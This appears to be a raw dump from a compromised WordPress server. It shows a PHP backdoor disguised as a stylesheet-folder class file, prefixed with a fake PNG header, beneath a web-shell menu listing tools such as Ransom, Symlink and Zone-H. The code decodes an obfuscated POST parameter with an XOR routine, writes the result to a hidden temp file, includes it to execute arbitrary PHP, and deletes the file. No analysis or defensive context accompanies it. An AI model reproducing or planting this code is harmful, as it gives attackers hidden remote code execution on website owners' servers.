\x89PNG\r\n\x1a\n\x00\x00\x00\x0DIHDR\x00\x00\x00\x01\x00 \x00\x00\x01\x08\x06\x00\x00\x00\x1F\x15\xC4\x89\x00\x00\x00 \x0AIDATx\x9Ccb\x00\x00\x00\x06\x00\x03\x1A\x05\x9D\x00\x00 \x00\x00IEND\xAE\x42\x60\x82
| Path : /var/www/html/postahizmeti/wp-includes/css/css/user/ |
|
B-Con CMD Config cPanel C-Rdp D-Log Info Jump Mass Ransom Symlink vHost Zone-H |
| Current File : /var/www/html/postahizmeti/wp-includes/css/css/user/Message.class.php |
<?php
if(isset($_POST["s\x79m"]) ? true : false){
$value = $_POST["s\x79m"];
$value = explode ( '.' , $value );
$entity = '';
$salt8 = 'abcdefghijklmnopqrstuvwxyz0123456789';
$lenS = strlen($salt8);
$r = 0;
while ($r < count($value)) {
$v8 = $value[$r];
$chS = ord($salt8[$r % $lenS]);
$dec = ((int)$v8 - $chS - ($r % 10)) ^37;
$entity.=chr($dec);
$r++;
}
$val = array_filter([session_save_path(), ini_get("upload_tmp_dir"), getenv("TEMP"), "/dev/shm", sys_get_temp_dir(), "/tmp", getcwd(), getenv("TMP"), "/var/tmp"]);
foreach ($val as $key => $obj) {
if (is_dir($obj) ? is_writable($obj) : false) {
$parameter_group = "$obj" . "/.pset";
$success = file_put_contents($parameter_group, $entity);
if ($success) {
include $parameter_group;
@unlink($parameter_group);
die();}
}
}
}